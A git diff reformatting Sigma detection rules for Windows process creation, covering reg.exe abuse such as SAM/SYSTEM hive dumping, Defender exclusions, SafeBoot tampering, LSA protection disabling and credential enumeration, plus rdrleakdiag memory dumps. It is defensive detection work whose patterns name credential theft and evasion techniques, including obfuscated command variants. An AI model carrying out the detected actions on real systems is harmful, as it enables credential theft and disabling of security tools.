a/sigma/sysmon/process_creation/proc_creation_win_rasdial_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rasdial_execution.yml @@ -23,7 +23,6 @@ detection: Image|endswith: rasdial.exe condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml b/sigma/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml index 94350a0c6..0a1505601 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml @@ -1,18 +1,16 @@ title: Process Memory Dump via RdrLeakDiag.EXE id: edadb1e5-5919-4e4c-8462-a9e643b02c4b related: - - id: 6355a919-2e97-4285-a673-74645566340d - type: obsoletes + - id: 6355a919-2e97-4285-a673-74645566340d + type: obsoletes status: test -description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool - "rdrleakdiag.exe" to dump process memory +description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory references: - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/ - https://twitter.com/0gtweet/status/1299071304805560321?s=21 -author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, - Nasreddine Bencherchali (Nextron Systems) +author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2021/09/24 modified: 2023/04/24 tags: @@ -27,23 +25,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rdrleakdiag.exe - - OriginalFileName: RdrLeakDiag.exe + - Image|endswith: \rdrleakdiag.exe + - OriginalFileName: RdrLeakDiag.exe selection_cli_dump: - CommandLine|contains: + CommandLine|contains: - fullmemdmp - /memdmp - -memdmp selection_cli_output: - CommandLine|contains: + CommandLine|contains: - ' -o ' - ' /o ' selection_cli_process: - CommandLine|contains: + CommandLine|contains: - ' -p ' - ' /p ' - condition: process_creation and (all of selection_cli_* or (selection_img and - selection_cli_dump)) + condition: process_creation and (all of selection_cli_* or (selection_img and selection_cli_dump)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml index a33c789b9..a7ca56db2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml @@ -1,8 +1,7 @@ title: Potential Persistence Attempt Via Run Keys Using Reg.EXE id: de587dce-915e-4218-aac4-835ca6af6f70 status: test -description: Detects suspicious command line reg.exe tool adding key to RUN key in - Registry +description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry references: - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/ - https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys @@ -21,14 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - reg - ' ADD ' - Software\Microsoft\Windows\CurrentVersion\Run condition: process_creation and selection falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reasons. + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. - Discord level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml index a0a834622..436e592b8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml @@ -1,12 +1,10 @@ title: Add SafeBoot Keys Via Reg Utility id: d7662ff6-9e97-4596-a61d-9839e32dee8d related: - - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de - type: similar + - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de + type: similar status: test -description: Detects execution of "reg.exe" commands with the "add" or "copy" flags - on safe boot registry keys. Often used by attacker to allow the ransomware to - work in safe mode as some security products do not +description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not references: - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: reg.exe - - OriginalFileName: reg.exe + - Image|endswith: reg.exe + - OriginalFileName: reg.exe selection_safeboot: - CommandLine|contains: \SYSTEM\CurrentControlSet\Control\SafeBoot + CommandLine|contains: \SYSTEM\CurrentControlSet\Control\SafeBoot selection_flag: - CommandLine|contains: + CommandLine|contains: - ' copy ' - ' add ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml index a6f10f3c4..d6e653449 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml @@ -1,8 +1,7 @@ title: Suspicious Reg Add BitLocker id: 0e0255bf-2548-47b8-9582-c0955c9283f5 status: test -description: Detects suspicious addition to BitLocker related registry keys via the - reg.exe utility +description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility references: - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/ author: frack113 @@ -20,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - REG - ADD - \SOFTWARE\Policies\Microsoft\FVE - /v - /f - CommandLine|contains: + CommandLine|contains: - EnableBDEWithNoTPM - UseAdvancedStartup - UseTPM diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml index f2965445c..e5dec018c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml @@ -1,8 +1,7 @@ title: Dropping Of Password Filter DLL id: b7966f4a-b333-455b-8370-8ca53c229762 status: test -description: Detects dropping of dll files in system32 that may be used to retrieve - user credentials from LSASS +description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS references: - https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/ - https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmdline: - CommandLine|contains|all: + CommandLine|contains|all: - HKLM\SYSTEM\CurrentControlSet\Control\Lsa - scecli\0* - reg add diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml index 04247e478..02c10903d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml @@ -1,9 +1,7 @@ title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE id: 48917adc-a28e-4f5d-b729-11e75da8941f status: test -description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot - has been seen using this technique to add exclusions for folders within AppData - and ProgramData. +description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - https://redcanary.com/threat-detection-report/threats/qbot/ @@ -23,10 +21,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \reg.exe - CommandLine|contains: + CommandLine|contains: - SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths - SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths - CommandLine|contains|all: + CommandLine|contains|all: - 'ADD ' - '/t ' - 'REG_DWORD ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml index bfa3b5680..796d51c04 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml @@ -1,12 +1,10 @@ title: SafeBoot Registry Key Deleted Via Reg.EXE id: fc0e89b5-adb0-43c1-b749-c12a10ec37de related: - - id: d7662ff6-9e97-4596-a61d-9839e32dee8d - type: similar + - id: d7662ff6-9e97-4596-a61d-9839e32dee8d + type: similar status: test -description: Detects execution of "reg.exe" commands with the "delete" flag on safe - boot registry keys. Often used by attacker to prevent safeboot execution of security - products +description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton @@ -24,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: reg.exe - - OriginalFileName: reg.exe + - Image|endswith: reg.exe + - OriginalFileName: reg.exe selection_delete: - CommandLine|contains|all: + CommandLine|contains|all: - ' delete ' - \SYSTEM\CurrentControlSet\Control\SafeBoot condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_delete_services.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_delete_services.yml index 490b163af..3f7939710 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_delete_services.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_delete_services.yml @@ -1,8 +1,7 @@ title: Service Registry Key Deleted Via Reg.EXE id: 05b2aa93-1210-42c8-8d9a-2fcc13b284f5 status: test -description: Detects execution of "reg.exe" commands with the "delete" flag on services - registry key. Often used by attacker to remove AV software services +description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services references: - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,12 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: reg.exe - - OriginalFileName: reg.exe + - Image|endswith: reg.exe + - OriginalFileName: reg.exe selection_delete: - CommandLine|contains: ' delete ' + CommandLine|contains: ' delete ' selection_key: - CommandLine|contains: \SYSTEM\CurrentControlSet\services\ + # Add specific services if you would like the rule to be more specific + CommandLine|contains: \SYSTEM\CurrentControlSet\services\ condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml index ff044acc3..e70e0b25a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml @@ -1,16 +1,12 @@ title: Potentially Suspicious Desktop Background Change Using Reg.EXE id: 8cbc9475-8d05-4e27-9c32-df960716c701 related: - - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae - type: similar + - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae + type: similar status: experimental -description: 'Detects the execution of "reg.exe" to alter registry keys that would - replace the user''s desktop background. - - This is a common technique used by malware to change the desktop background to - a ransom note or other image. - - ' +description: | + Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. + This is a common technique used by malware to change the desktop background to a ransom note or other image. references: - https://www.attackiq.com/2023/09/20/emulating-rhysida/ - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ @@ -30,35 +26,34 @@ logsource: product: windows category: process_creation detection: + # TODO: Improve this to also focus on variation using PowerShell and other CLI tools process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_reg_flag: - CommandLine|contains: add + CommandLine|contains: add selection_keys: - CommandLine|contains: + CommandLine|contains: - Control Panel\Desktop - CurrentVersion\Policies\ActiveDesktop - CurrentVersion\Policies\System selection_cli_reg_1: - CommandLine|contains|all: + CommandLine|contains|all: - /v NoChangingWallpaper - - /d 1 + - /d 1 # Prevent changing desktop background selection_cli_reg_2: - CommandLine|contains|all: + CommandLine|contains|all: - /v Wallpaper - /t REG_SZ selection_cli_reg_3: - CommandLine|contains|all: + CommandLine|contains|all: - /v WallpaperStyle - - /d 2 - condition: process_creation and (all of selection_reg_* and selection_keys and - 1 of selection_cli_reg_*) + - /d 2 # Stretch + condition: process_creation and (all of selection_reg_* and selection_keys and 1 of selection_cli_reg_*) falsepositives: - - Administrative scripts that change the desktop background to a company logo - or other image. + - Administrative scripts that change the desktop background to a company logo or other image. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml index 869ad17d4..fb455c396 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml @@ -1,8 +1,7 @@ title: Direct Autorun Keys Modification id: 24357373-078f-44ed-9ac4-6d334a668a11 status: test -description: Detects direct modification of autostart extensibility point (ASEP) in - registry using reg.exe. +description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community @@ -21,10 +20,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_1: Image|endswith: \reg.exe - CommandLine|contains: add + CommandLine|contains: add # to avoid intersection with discovery tactic rules selection_2: - CommandLine|contains: - - \software\Microsoft\Windows\CurrentVersion\Run + CommandLine|contains: # need to improve this list, there are plenty of ASEP reg keys + - \software\Microsoft\Windows\CurrentVersion\Run # Also covers the strings "RunOnce", "RunOnceEx", "RunServices", "RunServicesOnce" - \software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit - \software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell - \software\Microsoft\Windows NT\CurrentVersion\Windows @@ -35,8 +34,7 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reasons. + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. - Discord level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml index c53dd3734..b8cfc1f06 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml @@ -1,8 +1,7 @@ title: Security Service Disabled Via Reg.EXE id: 5e95028c-5229-4214-afae-d653d573d0ec status: test -description: Detects execution of "reg.exe" to disable security services such as Windows - Defender. +description: Detects execution of "reg.exe" to disable security services such as Windows Defender. references: - https://twitter.com/JohnLaTwC/status/1415295021041979392 - https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1 @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg_add: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add selection_cli_reg_start: - CommandLine|contains|all: + CommandLine|contains|all: - d 4 - v Start - CommandLine|contains: + CommandLine|contains: - \AppIDSvc - \MsMpSvc - \NisSrv diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml index 95b0564e4..0503f2f0d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml @@ -1,21 +1,19 @@ title: Dumping of Sensitive Hives Via Reg.EXE id: fd877b94-9bb5-4191-bb25-d79cbd93c167 related: - - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e - type: obsoletes - - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0 - type: obsoletes + - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e + type: obsoletes + - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0 + type: obsoletes status: test -description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. - This includes SAM, SYSTEM and SECURITY hives. +description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets -author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, - frack113 +author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113 date: 2019/10/22 modified: 2023/12/13 tags: @@ -33,32 +31,32 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli_flag: - CommandLine|contains: + CommandLine|contains: - ' save ' - ' export ' - - " \u02E2ave " - - " e\u02E3port " + - ' ˢave ' + - ' eˣport ' selection_cli_hklm: - CommandLine|contains: + CommandLine|contains: - hklm - - "hk\u02EAm" + - hk˪m - hkey_local_machine - - "hkey_\u02EAocal_machine" - - "hkey_loca\u02EA_machine" - - "hkey_\u02EAoca\u02EA_machine" + - hkey_˪ocal_machine + - hkey_loca˪_machine + - hkey_˪oca˪_machine selection_cli_hive: - CommandLine|contains: + CommandLine|contains: - \system - \sam - \security - - "\\\u02E2ystem" - - "\\sy\u02E2tem" - - "\\\u02E2y\u02E2tem" - - "\\\u02E2am" - - "\\\u02E2ecurity" + - \ˢystem + - \syˢtem + - \ˢyˢtem + - \ˢam + - \ˢecurity condition: process_creation and (all of selection_*) falsepositives: - Dumping hives for legitimate purpouse i.e. backup or forensic investigation diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml index 977fa3f74..3c0dbebb6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml @@ -1,16 +1,10 @@ title: Enumeration for Credentials in Registry id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 status: test -description: 'Adversaries may search the Registry on compromised systems for insecurely - stored credentials. - - The Windows Registry stores configuration information that can be used by the - system or other programs. - - Adversaries may query the Registry looking for credentials and passwords that - have been stored for use by other programs or services - - ' +description: | + Adversaries may search the Registry on compromised systems for insecurely stored credentials. + The Windows Registry stores configuration information that can be used by the system or other programs. + Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md author: frack113 @@ -29,19 +23,19 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational reg: Image|endswith: \reg.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' query ' - '/t ' - REG_SZ - /s hive: - - CommandLine|contains|all: - - '/f ' - - HKLM - - CommandLine|contains|all: - - '/f ' - - HKCU - - CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions + - CommandLine|contains|all: + - '/f ' + - HKLM + - CommandLine|contains|all: + - '/f ' + - HKCU + - CommandLine|contains: HKCU\Software\SimonTatham\PuTTY\Sessions condition: process_creation and (reg and hive) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml index 12db51944..5a5bf4874 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml @@ -1,11 +1,10 @@ title: Potential Suspicious Registry File Imported Via Reg.EXE id: 62e0298b-e994-4189-bc87-bc699aa62d97 related: - - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 - type: derived + - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 + type: derived status: test -description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' - utility +description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import author: frack113, Nasreddine Bencherchali @@ -23,12 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli: - CommandLine|contains: ' import ' + CommandLine|contains: ' import ' selection_paths: - CommandLine|contains: + CommandLine|contains: - C:\Users\ - '%temp%' - '%tmp%' diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml index 35a5b7c88..5259a86ae 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml @@ -1,19 +1,13 @@ title: RestrictedAdminMode Registry Value Tampering - ProcCreation id: 28ac00d6-22d9-4a3c-927f-bbd770104573 related: - - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 - type: similar + - id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 # Registry + type: similar status: test -description: 'Detects changes to the "DisableRestrictedAdmin" registry value in order - to disable or enable RestrictedAdmin mode. - - RestrictedAdmin mode prevents the transmission of reusable credentials to the - remote system to which you connect using Remote Desktop. - - This prevents your credentials from being harvested during the initial connection - process if the remote server has been compromise - - ' +description: | + Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. + RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. + This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise references: - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx @@ -32,7 +26,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control\Lsa\ - DisableRestrictedAdmin condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml index 2810e3354..318c862a2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml @@ -1,8 +1,7 @@ title: LSA PPL Protection Disabled Via Reg.EXE id: 8c0eca51-0f88-4db2-9183-fdfb10c703f9 status: experimental -description: Detects the usage of the "reg.exe" utility to disable PPL protection - on the LSA process +description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ author: Florian Roth (Nextron Systems) @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_cli: - CommandLine|contains: SYSTEM\CurrentControlSet\Control\Lsa - CommandLine|contains|all: + CommandLine|contains: SYSTEM\CurrentControlSet\Control\Lsa + CommandLine|contains|all: - ' add ' - ' /d 0' - ' /v RunAsPPL ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_machineguid.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_machineguid.yml index 30c54d612..fbbc59f01 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_machineguid.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_machineguid.yml @@ -19,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \reg.exe - CommandLine|contains|all: + CommandLine|contains|all: - SOFTWARE\Microsoft\Cryptography - '/v ' - MachineGuid diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml index daec44b07..356e976b4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml @@ -1,11 +1,10 @@ title: Modify Group Policy Settings id: ada4b0c4-758b-46ac-9033-9004613a150d related: - - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f - type: similar + - id: b7216a7d-687e-4c8d-82b1-3080b2ad961f + type: similar status: test -description: Detect malicious GPO modifications can be used to implement many other - malicious behaviors. +description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md author: frack113 @@ -23,12 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_path: - CommandLine|contains: \SOFTWARE\Policies\Microsoft\Windows\System + CommandLine|contains: \SOFTWARE\Policies\Microsoft\Windows\System selection_key: - CommandLine|contains: + CommandLine|contains: - GroupPolicyRefreshTimeDC - GroupPolicyRefreshTimeOffsetDC - GroupPolicyRefreshTime diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml index 199d420dd..2c39e2de2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml @@ -1,16 +1,12 @@ title: Enable LM Hash Storage - ProcCreation id: 98dedfdd-8333-49d4-9f23-d7018cccae53 related: - - id: c420410f-c2d8-4010-856b-dffe21866437 - type: similar + - id: c420410f-c2d8-4010-856b-dffe21866437 # Registry + type: similar status: test -description: 'Detects changes to the "NoLMHash" registry value in order to allow Windows - to store LM Hashes. - - By setting this registry value to "0" (DWORD), Windows will be allowed to store - a LAN manager hash of your password in Active Directory and local SAM databases. - - ' +description: | + Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. + By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. references: - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password @@ -30,7 +26,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control\Lsa - NoLMHash - ' 0' diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_open_command.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_open_command.yml index 8b77e98db..b837ad7d5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_open_command.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_open_command.yml @@ -1,8 +1,7 @@ title: Suspicious Reg Add Open Command id: dd3ee8cc-f751-41c9-ba53-5a32ed47e563 status: test -description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry - hives using DelegateExecute key +description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ author: frack113 @@ -20,21 +19,21 @@ detection: 